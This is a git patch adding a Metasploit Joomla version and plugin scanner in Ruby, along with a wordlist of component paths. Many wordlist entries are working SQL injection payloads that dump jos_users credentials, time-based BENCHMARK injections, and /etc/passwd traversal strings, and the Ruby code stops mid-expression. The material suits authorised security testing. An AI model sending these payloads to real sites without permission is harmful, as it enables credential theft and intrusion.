From 0b61d28e0ee433e9a9daf9f411b61993e30c5baa Mon Sep 17 00:00:00 2001 From: f8lerror Date: Thu, 17 Jan 2013 11:36:59 -0500 Subject: [PATCH 1/7] added Joomla scanner and url wordlist --- data/wordlists/pcheck.txt | 627 ++++++++++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 270 ++++++++ 2 files changed, 897 insertions(+) create mode 100755 data/wordlists/pcheck.txt create mode 100755 modules/auxiliary/scanner/http/joomla_vulnscan.rb diff --git a/data/wordlists/pcheck.txt b/data/wordlists/pcheck.txt new file mode 100755 index 0000000000..b65dd2a422 --- /dev/null +++ b/data/wordlists/pcheck.txt @@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php +administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery +components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="> +components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ +components/com_cx/ +components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ +components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ +components/com_hotspots/ +components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ +components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ +components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ +components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +http://{target}/components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/">/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 +index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ +index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] +index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 +index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- +index.php?option=com_filecabinet&task=download&cid[]=7 +index.php?option=com_firmy&task=section_show_set&Id=-1 +index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R +index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= +index.php?option=com_graphics&controller= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= +index.php?option=com_huruhelpdesk&view=detail +index.php?option=com_huruhelpdesk&view=detail&cid[0]= +index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 +index.php?option=com_iproperty&view=agentproperties&id= +index.php?option=com_jacomment&view= +index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 +index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_jcommunity&controller=members&task=1' +index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 +index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 +index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 +index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 +index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_jfuploader&Itemid= +index.php?option=com_jgen&task=view&id= +index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 +index.php?option=com_jimtawl&Itemid=12&task= +index.php?option=com_jmarket&controller=product&task=1' +index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' +index.php?option=com_jomdirectory&task=search&type=111+ +index.php?option=com_joomdle&view=detail&cat_id=1&course_id= +index.php?option=com_joomla_flash_uploader&Itemid=1 +index.php?option=com_joomleague&func=showNextMatch&p=[sqli] +index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] +index.php?option=com_joomtouch&controller= +index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 +index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 +index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users +index.php?option=com_jstore&controller=product-display&task=1' +index.php?option=com_jsubscription&controller=subscription&task=1' +index.php?option=com_jtickets&controller=ticket&task=1' +index.php?option=com_konsultasi&act=detail&sid= +index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en +index.php?option=com_kunena&func=userlist&search= +index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' +index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- +index.php?option=com_matamko&controller= +index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm +index.php?option=com_neorecruit&task=offer_view&id= +index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- +index.php?option=com_noticeboard&controller= +index.php?option=com_obsuggest&controller= +index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- +index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- +index.php?option=com_oziogallery&Itemid= +index.php?option=com_page&id=53 +index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] +index.php?option=com_phocagallery&view=categories&Itemid= +index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_php&file=../../../../../../../../../../etc/passwd +index.php?option=com_php&file=../images/phplogo.jpg +index.php?option=com_php&file=../js/ie_pngfix.js +index.php?option=com_ponygallery&Itemid=[sqli] +index.php?option=com_products&catid=-1 +index.php?option=com_products&id=-1 +index.php?option=com_products&product_id=-1 +index.php?option=com_products&task=category&catid=-1 +index.php?option=com_properties&task=agentlisting&aid= +index.php?option=com_qcontacts&Itemid=1' +index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts +index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_restaurantguide&view=country&id='&Itemid=69 +index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' +index.php?option=com_seyret&view= +index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- +index.php?option=com_smartsite&controller= +index.php?option=com_spa&view=spa_product&cid= +index.php?option=com_spidercalendar +index.php?option=com_spidercalendar&date=1' +index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_staticxt&staticfile=test.php&id=1923 +index.php?option=com_szallasok&mode=8&id=25 (SQL) +index.php?option=com_tag&task=tag&tag= +index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- +index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users +index.php?option=com_ultimateportfolio&controller= +index.php?option=com_users&view=registration +index.php?option=com_virtuemart&page=account.index&keyword=[sqli] +index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_x-shop&action=artdetail&idd=' +index.php?option=com_x-shop&action=artdetail&idd='[SQLi] +index.php?option=com_xcomp&controller=../../[LFI]%00 +index.php?option=com_xvs&controller=../../[LFI]%00 +index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- +index.php?option=com_yjcontactus&view= +index.php?option=com_youtube&id_cate=4 +index.php?option=com_zina&view=zina&Itemid=9 +index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= +index.php?search=NoGe&option=com_esearch&searchId= +index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube +index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- +js/index.php?option=com_socialads&view=showad&Itemid=94 +libraries/joomla/utilities/compat/php50x.php +libraries/pcl/pcltar.php +libraries/phpmailer/phpmailer.php +libraries/phpxmlrpc/xmlrpcs.php +modules/mod_artuploader/upload.php"); +modules/mod_as_category.php +modules/mod_calendar.php +modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] +modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); +modules/mod_jfancy/script.php"); +modules/mod_ppc_simple_spotlight/elements/upload_file.php +modules/mod_ppc_simple_spotlight/img/ +modules/mod_pxt/ +modules/mod_quick_question.php +modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 +patch/makedown.php?arquivo=../../../../etc/passwd +plugins/content/efup_files/helper.php"); +plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> +plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ +plugins/editors/xstandard/attachmentlibrary.php +print.php?task=person&id=36 and 1=1 +templates/be2004-2/ +templates/ja_purity/ +wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- +web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb new file mode 100755 index 0000000000..c8cbfbae27 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -0,0 +1,270 @@ +## +# $Id: joomla_vulnscan.rb +## +## +#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples. +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Joomla Scanner', + 'Version' => '$Revision: 14774 $', + 'Description' => %q{ + This module scans the Joomla install for information and potential vulnerabilites. + }, + 'Author' => [ 'f8lerror' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('PATH', [ true, "The path to the Joomla install", '/']), + OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), + + OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", + File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt") + ] + ) + + ], self.class) + end + + def osfingerprint(response) + if(response.headers.has_key?('Server') ) + if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) + os = "Windows" + elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) + os = "*Nix" + else + os = "Unknown Server Header Reporting: "+response.headers['Server'] + end + end + return os + end + def fingerprint(response, app) + + if(response.body =~ /(.+)<\/version\/?>/i) + v = $1 + out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" + elsif(response.body =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or + response.body =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or + response.body =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or + response.body =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or + response.body =~/20196 2011\-01\-09 02\:40\:25Z ian/) + out = "1.6" + elsif(response.body =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or + response.body =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or response.body =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or response.body =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/) + out = "1.7" + elsif(response.body =~ /Joomla! 1.5/ or + response.body =~ /MooTools\=\{version\:\'1\.12\'\}/ or response.body =~ /11391 2009\-01\-04 13\:35\:50Z ian/) + out = "1.5" + elsif(response.body =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or + response.body =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ ) + out = "2.5" + elsif(response.body =~ /\s+ tpath, + 'method' => 'GET', + }, 5) + return if not bres or not bres.body or not bres.code + bres.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| + papp = bapp.chomp + plugin_search(tpath,papp,ip,bres) + end + end + + end + def check_app(tpath, app, ip) + res = send_request_cgi({ + 'uri' => tpath+app, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + os = osfingerprint(res) + if (res.code.to_i == 200) + out = fingerprint(res,app) + return if not out + if(out =~ /Unknown Joomla/) + print_error("Unable to identify Joomla Version with this file #{app}") + return false + else + print_good("Joomla Version:#{out} from: #{app} ") + print_good("OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Joomla Version', + :data => out + ) + return true + end + elsif(res.code.to_i == 403 and datastore['VERBOSE']) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + print_status("#{ip} denied access to #{url} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + print_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + print_status("#{ip} requires a SSL client certificate") + else + print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + end + + end + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + def scan_pages(tpath,iapp, ip) + res = send_request_cgi({ + 'uri' => tpath+iapp, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + if (res.code.to_i == 200) + if(res.body =~ /Administration Login/ and res.body =~ 